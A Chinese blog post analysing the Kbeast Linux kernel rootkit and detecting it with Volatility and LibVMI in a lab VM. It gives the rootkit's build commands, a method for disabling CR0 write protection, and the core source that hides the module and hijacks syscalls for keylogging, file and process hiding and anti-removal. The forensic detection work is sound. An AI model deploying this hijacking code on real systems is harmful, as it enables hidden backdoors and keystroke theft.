Kbeast Analysis and Detection
- 0x00 全文环境
- 0X01 Kbeast 特性
- 0X02 系统调用劫持基础
- 0X03 Kbeast 使用
- 0X04 Kbeast 核心
- 0X05 Kbeast Detection
0x00 全文环境
Host Ubuntu 12.04 + Guest Ubuntu 10.04/11.04 + Libvmi + Volatility
其中Kbeast运行在Guest Ubuntu 10.04/11.04中,libvmi与volatility运行在Host Ubuntu12.04中。
0X01 Kbeast 特性
以下是Kbeast实现的功能:
- 隐藏可加载模块(LKM)
- 隐藏文件/目录
- 隐藏进程(ps,pstree,top,lsof)
- 隐藏套接字和网络连接(netstat,lsof)
- 记录键盘操作捕获用户行为
- 反杀死进程
- 反移除文件
- 反删除可加载模块
- root提权后门
- 远程绑定后门
0X02 系统调用劫持基础
上述的Kbeast特性都是通过系统调用劫持实现的。在kernel 2.6.*之前,系统调用表"sys_call_table"是可以直接导出引用的,如:
extern void *sys_call_table[]; sys_call_table[__NR_syscall] = pointer 而在kernel 2.6.* 之后禁用了这种特性,并且其所在页是写保护的。然而,系统调用表依然在内存中,如果知道其所在内存地址,依然可以通过指针访问。内核中的符号表System.map (一般在/boot/目录下)记录了所有的符号及其地址,当然也包括系统调用表"sys_call_table". 以Ubuntu 10.04为例,执行:
grep sys_call_table /boot/System.map-2.6.32-21-generic 显示的结果为
c0592150 R sys_call_table c0592150指的是线性地址,R说明此地址所在的页面Read-only。目前的CPU都会将CR0控制寄存器的第16位(wp-bit)置1,将页面开启保护模式,这时CPU处于"write-proteed"模式,否则处于"read/write"模式。CR0寄存器的位描述可参考 CR0 .
如果能将WP位置0,就可以访问内存页面,读写系统调用表了。 下面这行代码便可实现此功能:
write_cr0 (read_cr0 () & (~ 0x10000)); 0X03 Kbeast 使用
下载 Kbeast .
tar xzf ipsecs-kbeast-v1.tar.gz cd kbeast-v1 ./setup build 1 具体可参考/kbeast-v1/setup 文件,参数1表示默认为kernel 2.6.32。测试过ubuntu11.04 内核为2.6.38,setup出错,作者声称: Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9, 2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64),理论上只要修改setup相关参数以及ipsecs-kbeast-vl.c文件中的系统调用表的地址即可适应其它版本内核,未测试。
成功编译后,kbeast就会加载到内核空间,rootkit安装在/usr/ h4x 路径下,生成/usr/ h4x /_h4x_bd进程,以及acctlog 记录文件, 路径以及文件名等参数可以在config.h文件中配置。当然在目标机器guest中无法找到相关文件,因为已经被隐藏了。下文会利用volatility检测到相关进程的路径。
0X04 Kbeast 核心
Kbeast以LKM的方式存在,以下是其核心代码:
/*init module insmod*/ static int init(void) { //Uncomment to hide this module list_del_init(&__this_module.list); struct tcp_seq_afinfo *my_afinfo = NULL; //proc_net is disappeared in 2.6.32, use init_net.proc_net struct proc_dir_entry *my_dir_entry = init_net.proc_net->subdir; write_cr0 (read_cr0 () & (~ 0x10000)); if(_KEYLOG_){ o_read=(void *)sys_call_table[__NR_read]; sys_call_table[__NR_read]=h4x_read; } o_write=(void *)sys_call_table[__NR_write]; sys_call_table[__NR_write]=h4x_write; #if defined(__x86_64__) o_getdents=sys_call_table [__NR_getdents]; sys_call_table [__NR_getdents]=h4x_getdents; #elif defined(__i386__) o_getdents64=sys_call_table [__NR_getdents64]; sys_call_table [__NR_getdents64]=h4x_getdents64; #else #error Unsupported architecture #endif o_unlink = sys_call_table [__NR_unlink]; sys_call_table [__NR_unlink] = h4x_unlink; o_rmdir = sys_call_table [__NR_rmdir]; sys_call_table [__NR_rmdir] = h4x_rmdir; o_unlinkat = sys_call_table [__NR_unlinkat]; sys_call_table [__NR_unlinkat] = h4x_unlinkat; o_rename = sys_call_table [__NR_rename]; sys_call_table [__NR_rename] = h4x_rename; o_open = sys_call_table [__NR_open]; sys_call_table [__NR_open] = h4x_open; o_kill = sys_call_table [__NR_kill]; sys_call_table [__NR_kill] = h4x_kill; o_delete_module = sys_call_table [__NR_delete_module]; sys_call_table [__NR_delete_module] = h4x_delete_module; write_cr0 (read_cr0 () | 0x10000); while(strcmp(my_dir_entry->name, "tcp")) my_dir_entry = my_dir_entry->next; if((my_afinfo = (struct tcp_seq_afinfo*)my_dir_entry->data)) { //seq_show is disappeared in 2.6.32, use seq_ops.show old_tcp4_seq_show = my_afinfo->seq_ops.show; my_afinfo->seq_ops.show = h4x_tcp4_seq_show; } return 0; } 首先将模块隐藏,取消CR0写保护,找到系统调用表地址,将其处理函数换成自己的函数,分别对应其中的特性。 如:
sys_call_table[__NR_read]=h4x_read; // log key sys_call_table[__NR_write]=h4x_write; // fake output ps,pstree,top,lsof sys_call_table [__NR_getdents]=h4x_getdents; //hide file and directory sys_call_table [__NR_unlink] = h4x_unlink; //Don't allow your file to be removed sys_call_table [__NR_rmdir] = h4x_rmdir; //Don't allow your directory to be removed sys_call_table [__NR_unlinkat] = h4x_unlinkat; //Don't allow your file and directory to be removed sys_call_table [__NR_rename] = h4x_rename; //Don't allow your file to be renamed/moved sys_call_table [__NR_open] = h4x_open; //Don't allow your file to be overwrited sys_call_table [__NR_kill] = h4x_kill; //Don't allow your process to be killed sys_call_table [__NR_delete_module] = h4x_delete_module; 0X05 Kbeast Detection Using Libvmi and Volatility
检测之前,先按照上一篇 文章搭好环境。
以下是分别利用volatility的linux_psaux、linux_pslist、linux_pstree、linux_lsof、linux_proc_maps、linux_chech_modules插件检测出来的结果,能检测出其隐藏的进程、模块、进程间的关系以及所在路径。
python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_psaux | grep _h4x_bd Pid Uid Gid Arguments 2316 2 2 ./_h4x_bd python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_pslist | grep _h4x_bd Offset Name Pid Uid Gid DTB Start Time 0xf579e680 _h4x_bd 2316 2 2 0x357c5000 2016-04-01 21:41:29 UTC+0000 python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_pstree | grep _h4x_bd Name Pid Uid ._h4x_bd 2316 2 python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_pslsof | grep _h4x_bd Offset Name Pid FD Path 0x00000000f579e680 _h4x_bd 2316 1 /dev/pts/0 0x00000000f579e680 _h4x_bd 2316 2 /dev/pts/0 0x00000000f579e680 _h4x_bd 2316 3 socket:[11708] python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_proc_maps | grep _h4x_bd linux_proc_maps Offset Pid Name Start End Flags Pgoff Major Minor Inode File Path 0x00000000f579e680 2316 _h4x_bd 0x0000000000adb000 0x0000000000adc000 --- 0x153000 251 1 134375 /lib/tls/i686/cmov/libc-2.11.1.so 0x00000000f579e680 2316 _h4x_bd 0x0000000000adc000 0x0000000000ade000 r-- 0x153000 251 1 134375 /lib/tls/i686/cmov/libc-2.11.1.so 0x00000000f579e680 2316 _h4x_bd 0x0000000000ade000 0x0000000000adf000 rw- 0x155000 251 1 134375 /lib/tls/i686/cmov/libc-2.11.1.so 0x00000000f579e680 2316 _h4x_bd 0x0000000000adf000 0x0000000000ae2000 rw- 0x0 0 0 0 0x00000000f579e680 2316 _h4x_bd 0x0000000008048000 0x0000000008049000 r-x 0x0 251 1 136169 /usr/_h4x_/_h4x_bd 0x00000000f579e680 2316 _h4x_bd 0x0000000008049000 0x000000000804a000 r-- 0x1000 251 1 136169 /usr/_h4x_/_h4x_bd 0x00000000f579e680 2316 _h4x_bd 0x000000000804a000 0x000000000804b000 rw- 0x2000 251 1 136169 /usr/_h4x_/_h4x_bd 0x00000000f579e680 2316 _h4x_bd 0x00000000b7875000 0x00000000b7876000 rw- 0x0 0 0 0 0x00000000f579e680 2316 _h4x_bd 0x00000000b7884000 0x00000000b7886000 rw- 0x0 0 0 0 0x00000000f579e680 2316 _h4x_bd 0x00000000bfd84000 0x00000000bfd99000 rw- 0x0 0 0 0 [stack] python vol.py -l vmi://1004desktop32 --profile=Linuxubuntu1004desktopx86 linux_check_moudles | grep _h4x_bd Module Address Module Name 0xf805dae0 ipsecs_kbeast_v1 当要清除module时,执行./setup clean. 但仍然会残留一些文件,无法删除。
Checking for make : /usr/bin/make Removing Kernel Module Removing Compiled Kernel Module Stoping Network Daemon Removing Backdoor File rm: cannot remove `./_h4x_bd': Permission denied Removing Installation Directory rm: cannot remove `/usr/_h4x_/.ipsecs-kbeast-v1.o.cmd': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.o': Permission denied rm: cannot remove `/usr/_h4x_/.ipsecs-kbeast-v1.ko.cmd': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.ko': Permission denied rm: cannot remove `/usr/_h4x_/.tmp_versions/ipsecs-kbeast-v1.mod': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.mod.c': Permission denied rm: cannot remove `/usr/_h4x_/.ipsecs-kbeast-v1.mod.o.cmd': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.c': Permission denied rm: cannot remove `/usr/_h4x_/bd-ipsecs-kbeast-v1.c': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.mod.o': Permission denied rm: cannot remove `/usr/_h4x_/ipsecs-kbeast-v1.cc1': Permission denied 如转载本文请注明出处
作者[新浪微博:@diting0x]
Reference
http://volatility-labs.blogspot.com/2012/09/movp-15-kbeast-rootkit-detecting-hidden.html
http://cradpdf.drdc-rddc.gc.ca/PDFS/unc199/p801869_A1b.pdf
https://memset.wordpress.com/2010/12/03/syscall-hijacking-kernel-2-6-systems/
正文到此结束
热门推荐
相关文章
Loading...
![[HBLOG]公众号](http://www.liuhaihua.cn/img/qrcode_gzh.jpg)
